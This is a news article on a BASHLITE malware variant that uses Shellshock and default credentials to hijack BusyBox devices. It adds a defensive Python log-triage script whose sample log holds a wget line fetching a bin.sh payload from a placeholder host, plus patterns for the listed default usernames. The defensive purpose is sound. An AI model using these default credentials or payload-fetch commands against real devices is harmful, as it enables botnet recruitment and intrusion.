BASHLITE Malware Leverages ShellShock to Hijack Devices Running BusyBox


A new variant of the BASHLITE malware targeting devices running BusyBox was spotted by security researchers at Trend Micro shortly after the public disclosure of the Shellshock vulnerability.


The malware is detected as ELF_BASHLITE.A (ELF_FLODDER.W). When executed on a victim's machine, it scans the network for devices and machines running BusyBox and attempts to access them using a predefined list of usernames and passwords. The list of usernames includes 'root', 'admin' and 'support', and the list of passwords includes 'root', 'admin', '12345', 'pass', 'password', 'support', '123456' and so on. Once a connection is established, it runs a command to download and run the bin.sh and bin2.sh scripts to gain control over the BusyBox system. This new version of Bashlite is therefore designed not only to identify systems running BusyBox, but also to hijack them.

"Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive," said threat response engineer Rhena Inocencio (Trend Micro). "As such, a remote attacker can issue commands or download other files on the devices thus compromising its security."
Trend Micro advised users to change the default usernames and passwords on these devices and, if possible, to disable remote shell access.
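
For defenders, the sequence described above (logins cycling through the listed account names, then a command referencing bin.sh or bin2.sh) can be triaged from device logs. The following is an added example, not code from Trend Micro or the original article; the key=value log format, event names, `triage` function and `min_users` threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Account names and script names taken from the article's description.
LISTED_USERS = {"root", "admin", "support"}
DROPPED_SCRIPTS = re.compile(r"\bbin2?\.sh\b")

# Constructed sample log; the key=value line format is an assumption.
SAMPLE_LOG = """\
t=100 event=login_failed src=198.51.100.7 user=root
t=101 event=login_failed src=198.51.100.7 user=admin
t=102 event=login_ok src=198.51.100.7 user=support
t=104 event=cmd src=198.51.100.7 user=support line="wget http://example.invalid/bin.sh"
t=150 event=login_failed src=203.0.113.5 user=root
t=151 event=login_failed src=203.0.113.5 user=admin
t=230 event=login_ok src=192.0.2.10 user=alice
t=240 event=cmd src=192.0.2.10 user=alice line="ls /var/bin.shadow"
"""

LINE_RE = re.compile(
    r't=(?P<t>\d+) event=(?P<event>\w+) src=(?P<src>\S+) user=(?P<user>\S+)'
    r'(?: line="(?P<line>[^"]*)")?'
)

def triage(log_text, min_users=2):
    """Return {src: verdict} for sources matching the described behaviour."""
    state = defaultdict(lambda: {"users": set(), "ok": False, "script": False})
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines we cannot parse rather than guess
        s = state[m["src"]]
        if m["event"] in ("login_failed", "login_ok") and m["user"] in LISTED_USERS:
            s["users"].add(m["user"])
            s["ok"] = s["ok"] or m["event"] == "login_ok"
        elif m["event"] == "cmd" and s["ok"] and DROPPED_SCRIPTS.search(m["line"] or ""):
            s["script"] = True
    verdicts = {}
    for src, s in state.items():
        if len(s["users"]) < min_users:
            continue  # a single listed account name is not a sweep
        if s["ok"] and s["script"]:
            verdicts[src] = "compromised"  # sweep, login, then script fetch
        elif s["ok"]:
            verdicts[src] = "logged-in"    # sweep succeeded, no script seen yet
        else:
            verdicts[src] = "sweep"        # credential cycling only
    return verdicts
```

A "compromised" verdict means the device should be treated as hijacked and rebuilt with non-default credentials; a "sweep" verdict means the default accounts are being probed and should be changed or disabled.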

Bashlite malware includes the payload of the Shellshock exploit code, and threat actors have used this critical ShellShock bash command vulnerability (CVE-2014-6271) to build botnets from hijacked devices, which are used to launch Distributed Denial of Service (DDoS) attacks.

The ShellShock vulnerability was disclosed on September 24, and by September 30 security firms estimated that attacks using the exploit could top 1 billion. More than 1000 organizations patched the ShellShock bug as fixes became available.
